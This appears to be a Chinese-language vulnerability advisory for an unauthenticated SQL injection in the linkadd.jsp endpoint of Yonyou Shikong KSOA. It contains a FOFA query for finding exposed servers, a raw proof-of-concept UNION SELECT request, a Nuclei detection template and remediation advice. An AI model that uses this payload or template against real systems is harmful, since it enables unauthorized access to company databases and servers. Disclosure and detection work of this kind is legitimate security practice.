用友时空KSOA linkadd存在SQL注入漏洞
一、漏洞简介
0x01 产品简介
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业前沿的IT需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。
0x02 漏洞概述
用友时空KSOA linkadd接口处存在 SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
0x03 网络测绘
app="用友-时空KSOA"
0x04 漏洞复现
使用md5加密数据
GET /linksframe/linkadd.jsp?id=666666%27+union+all+select+null%2Cnull%2Csys.fn_sqlvarbasetostr%28HashBytes%28%27MD5%27%2C%27123456987%27%29%29%2Cnull%2Cnull%2C%27 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
0x05 Nuclei
id: yonyou-KSOA-linkadd-SQL
info:
name: 用友时空KSOA-SQL-linkadd
author: WLF
severity: high
metadata:
fofa-query: app="用友-时空KSOA"
variables:
filename: "{{to_lower(rand_base(10))}}"
boundary: "{{to_lower(rand_base(20))}}"
http:
- raw:
- |
GET /linksframe/linkadd.jsp?id=666666%27+union+all+select+null%2Cnull%2Csys.fn_sqlvarbasetostr%28HashBytes%28%27MD5%27%2C%27123456987%27%29%29%2Cnull%2Cnull%2C%27 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
matchers:
- type: dsl
dsl:
- status_code==200 && contains_all(body,"35092b43f6daab6e117b2429f5e623")
0x06 修复建议
采用参数化查询或预编译语句等安全的数据库访问方法,确保用户输入的数据不直接与SQL查询语句拼接,从而防止恶意SQL代码的注入。对所有用户输入进行严格的验证和过滤,包括对数据类型、长度、格式等的验证,以确保输入数据符合预期的格式和范围。采用最小权限原则,为数据库用户分配最小必要的权限,避免在SQL查询中暴露敏感信息。对数据库服务器和应用程序进行定期更新和维护,及时应用安全补丁,以修复已知的漏洞。进行安全审计和监控,记录数据库访问日志,并监测异常行为,及时发现和响应潜在的攻击。